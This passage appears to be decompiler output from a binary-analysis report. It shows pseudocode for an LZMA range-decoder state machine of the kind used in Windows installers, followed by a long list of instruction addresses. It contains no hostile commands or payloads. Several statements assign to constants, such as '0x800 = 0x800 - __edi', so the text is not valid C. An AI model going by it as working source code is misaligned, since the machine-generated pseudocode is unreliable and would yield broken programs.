										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4)); // executed
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                        0x00000000
                                                        0x00406956
                                                        0x00406956
                                                        0x0040695b
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00407038
                                                        0x00407038
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00407013
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x00000000
                                                        0x004071c6
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407035
                                                        0x00000000
                                                        0x00407035
                                                        0x0040695d
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00000000
                                                        0x00406b8e
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a1a
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406aca
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
